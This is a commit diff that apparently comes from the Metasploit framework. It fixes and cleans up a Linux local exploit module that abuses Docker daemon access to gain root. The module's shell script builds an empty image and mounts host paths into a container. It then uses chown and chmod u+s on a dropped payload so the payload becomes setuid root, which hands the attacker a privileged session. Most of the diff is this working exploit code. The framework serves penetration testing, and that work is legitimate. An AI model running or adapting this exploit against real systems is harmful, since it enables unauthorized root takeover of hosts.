Fix and clean module
William Vu
parent
6f35a04e21
commit
c6214d9c5e
|
|
@ -3,14 +3,12 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
Rank = ExcellentRanking
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
|
|
@ -26,18 +24,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DefaultOptions' => { 'PrependFork' => true },
|
||||
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
|
||||
'SessionTypes' => ['shell', 'meterpreter']
|
||||
}
|
||||
))
|
||||
register_advanced_options([
|
||||
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
|
||||
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
|
||||
if cmd_exec('docker ps && echo true') == 'true'
|
||||
print_error("Failed to access Docker daemon.")
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
|
|
@ -58,11 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status shell_script(exe_path)
|
||||
vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
|
||||
|
||||
stime = Time.now.to_f
|
||||
print_status "Waiting for payload"
|
||||
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
|
||||
Rex.sleep(1)
|
||||
end
|
||||
print_status "Waiting #{datastore['WfsDelay']}s for payload"
|
||||
end
|
||||
|
||||
def shell_script(exploit_path)
|
||||
|
|
@ -70,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
|
||||
|
||||
%Q{
|
||||
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | cut -d ":" -f2`
|
||||
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
|
||||
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
|
||||
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
|
||||
docker rmi -f $IMG
|
||||
|
|
@ -79,4 +72,3 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue